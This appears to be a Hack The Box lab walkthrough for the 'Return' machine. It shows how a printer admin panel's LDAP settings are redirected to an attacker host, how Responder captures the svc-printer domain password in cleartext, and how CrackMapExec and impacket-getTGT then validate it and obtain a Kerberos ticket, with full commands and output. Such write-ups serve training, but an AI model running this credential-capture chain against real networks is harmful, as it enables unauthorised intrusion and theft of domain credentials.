Web
Nmap discovered a web server on the target port 80
The running service is Microsoft IIS httpd 10.0
Webroot
It seems that the web server serves as an administrative GUI panel for printer/s
Wappalyzer identified technologies involved.
I can see that it’s written in PHP 7.4.13
Those two buttons, Fax and Troubleshooting, in the header don’t seem to work
However, the Settings button leads to the settings.php file
There is already pre-configured information sitting right at the form
Username is svc-printer
Password is either obfuscated and 7 characters long, or just a placeholder
I modified the form for testing
It’s interesting how it only sends out a POST request to the file with the ip parameter although there appears to be 3 other parameters present in the form
That still means that I am able to configure the ip parameter
I first started a Netcat listener on the Kali port 389
I set the ip parameter to kali and sent the POST request
I got an inbound connection to the Netcat listener on Kali, and that appears to be a CLEARTEXT credential
┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ sudo responder -I tun0 -v
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
to support this project:
patreon -> https://www.patreon.com/PythonResponder
paypal -> https://paypal.me/PythonResponder
author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] http options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] poisoning options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] generic options:
Responder NIC [tun0]
Responder IP [10.10.14.5]
responder ipv6 [dead:beef:2::1003]
Challenge set [1122334455667788]
Don't Respond To Names ['ISATAP']
[+] current session variables:
Responder Machine Name [WIN-CJXUQZJ30UW]
Responder Domain Name [D6VF.LOCAL]
Responder DCE-RPC Port [48671]
[+] Listening for events...
[LDAP] Attempting to parse an old simple Bind request.
[ldap] cleartext client : 10.10.11.108
[ldap] cleartext username : return\svc-printer
[ldap] cleartext password : 1edFg43012!!I can confirm that with responder as well
Although it appears to be a domain credential, it is always a good practice to validate it
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ cme smb $IP -d RETURN.LOCAL --kdcHost printer.return.local -u svc-printer -p '1edFg43012!!'
SMB 10.10.11.108 445 PRINTER [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:RETURN.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.11.108 445 PRINTER [+] RETURN.LOCAL\svc-printer:1edFg43012!! The credential has been validated against the SMB server through crackmapexec
┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ impacket-getTGT 'return.local/svc-printer:1edFg43012!!' -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in svc-printer.ccacheI also saved a TGT for the svc-printer user for better OPSEC that I can opt to continue the operation through the pass-the-ticket technique
Now that I have a valid domain credential, I can get into the in-depth enumeration